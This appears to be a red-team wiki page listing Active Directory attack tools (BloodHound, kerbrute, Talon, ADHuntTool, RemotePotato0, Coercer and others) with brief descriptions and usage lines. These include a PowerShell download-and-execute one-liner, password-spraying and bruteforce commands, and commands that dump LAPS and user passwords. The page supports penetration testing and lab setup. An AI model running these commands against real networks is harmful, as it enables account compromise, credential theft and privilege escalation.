Active Directory

Vulnerable-AD: Create a vulnerable AD via this script.

Supported Attacks

  • Abusing ACLs/ACEs

  • Kerberoasting

  • AS-REP Roasting

  • Abuse DnsAdmins

  • Password in Object Description

  • User Objects With Default password (Changeme123!)

  • Password Spraying

  • DCSync

  • Silver Ticket

  • Golden Ticket

  • Pass-the-Hash

  • Pass-the-Ticket

  • SMB Signing Disabled

# if you didn't install Active Directory yet , you can try 
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\\Windows\\NTDS" -DomainMode "7" -DomainName "" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\\Windows\\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\\Windows\\SYSVOL" -Force:$true
# if you already installed Active Directory, just run the script !
IEX((new-object net.webclient).downloadstring(""));
Invoke-VulnAD -UsersLimit 100 -DomainName ""

bloodhound: BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths.

Max: Maximizing BloodHound. Max is a good boy.

cypheroth: Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.

./ -u neo4j -p BloodHound -d TESTLAB.LOCAL -a localhost:7687 -v true -t 10s

InveighZero: InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.

CrackMapExec: CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.

EXE version to use along with Windows machines (e.g., Commando-VM).

FindUncommonShares: The script is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Active Directory Domains.

KerberosUserEnum: Kerberos accounts enumeration taking advantage of AS-REQ, I wrote this script to practice my understanding of Kerberos.

./ --file=/tmp/usernames --dcip= --domain=TESTDOMAIN --port=88

kerbrute: A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

Kerbrute has three main commands:

  • bruteuser - Bruteforce a single user's password from a wordlist

  • bruteforce - Read username:password combos from a file or stdin and test them

  • passwordspray - Test a single password against a list of users

  • userenum - Enumerate valid domain usernames via Kerberos

./kerbrute_linux_amd64 userenum -d usernames.txt
./kerbrute_linux_amd64 passwordspray -d domain_users.txt Password123
./kerbrute_linux_amd64 bruteforce --dc 192.168.x.x -d domain users.txt --safe -o out.txt

ldapdomaindump: Active Directory information dumper via LDAP.

ADSearch: A tool written for cobalt-strike's execute-assembly command that allows for more efficent querying of AD.

ADHuntTool: official report for the AdHuntTool. C# Script used for Red Team. It can be used by Cobalt Strike execute-assembly or as a standalone executable.

Usage: ADHuntTool.exe options domain [arguments]

ADHuntTool.exe Set
ADHuntTool.exe DumpLocalAdmin RingZer0 *optional*computername
ADHuntTool.exe DumpLocalGroup RingZer0 *optional*computername
ADHuntTool.exe DumpRemoteSession RingZer0 *optional*computername
ADHuntTool.exe DumpWkstaSession RingZer0 *optional*computername
ADHuntTool.exe CheckAdmin RingZer0 *optional*computername
ADHuntTool.exe DumpTrust RingZer0
ADHuntTool.exe DumpAllUsers RingZer0
ADHuntTool.exe DumpUser RingZer0 mr.un1k0d3r
ADHuntTool.exe DumpUsersEmail RingZer0
ADHuntTool.exe DumpAllComputers RingZer0 
ADHuntTool.exe DumpComputer RingZer0 DC01
ADHuntTool.exe DumpAllGroups RingZer0
ADHuntTool.exe DumpGroup RingZer0 "Domain Admins"
ADHuntTool.exe DumpPasswordPolicy Ringzer0,DC=local
ADHuntTool.exe DumpCertificateTemplates Ringzer0,DC=local
ADHuntTool.exe DumpPwdLastSet RingZer0
ADHuntTool.exe DumpLastLogon RingZer0
ADHuntTool.exe CheckManaged RingZer0
ADHuntTool.exe DumpLapsPassword RingZer0 *optional*computername  
ADHuntTool.exe DumpUserPassword RingZer0   
ADHuntTool.exe DumpRemoteSession RingZer0  *optional*computername  
ADHuntTool.exe PasswordBruteForce RingZer0 *optional*username (samaccountname) 
ADHuntTool.exe GetShare target *optional*Domain\Username Password
ADHuntTool.exe GetService target *optional*Domain\Username Password

Talon: Talon is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can either use a single domain controller or multiple ones to perform these attacks, randomizing each attempt, between the domain controllers and services (LDAP or Kerberos).

root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

  __________  ________  ___       ________  ________
  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \
  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \
       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \
        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \
         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

[-] STARLABS.LOCAL\ballen:Password! = Failed
[-] STARLABS.LOCAL\csnow:Password! = Failed
[-] STARLABS.LOCAL\wwest:Password! = User's Account Locked
[*] Account lock out detected - Do you want to continue.[y/n]:

RemotePotato0: RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.

SharpCollection: Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.

Last updated